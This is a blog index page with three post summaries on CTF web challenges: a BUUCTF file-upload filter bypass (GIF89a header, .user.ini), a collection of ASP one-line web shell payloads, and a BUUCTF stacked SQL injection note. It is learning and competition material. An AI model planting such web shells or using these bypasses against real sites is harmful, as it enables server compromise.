2020年1月9日
buuctf CheckIn
摘要: 文件上传 黑名单过滤 调用了php的exif_imagetype()函数 利用文件头GIF89a绕过即可 过滤了文本内容<? <script language='php'><script>绕过即可 修改MIME和利用特殊扩展名均失败 正确姿势: 利用 .user.ini .user.ini 我们先在 阅读全文
posted @ 2020-01-09 19:32 Chr1sto 阅读(786) 评论(0) 推荐(0)
各种小马收集
摘要: ASP<%eval request("sb")%> <%execute request("sb")%> <%execute(request("sb"))%> <%execute request("sb")%><%'<% loop <%:%> <%'<% loop <%:%><%execute req 阅读全文
posted @ 2020-01-09 13:43 Chr1sto 阅读(982) 评论(0) 推荐(0)
2020年1月8日
buuctf Easysql 小记
摘要: 堆叠注入 利用原理: 补充系统变量@@sql_modesql_mode:是一组mysql支持的基本语法及校验规则PIPES_AS_CONCAT:将“||”视为字符串的连接操作符而非或运算符,这和Oracle数据库是一样的,也和字符串的拼接函数Concat相类似 猜测后台sql语句为: select 阅读全文
posted @ 2020-01-08 01:19 Chr1sto 阅读(824) 评论(0) 推荐(0)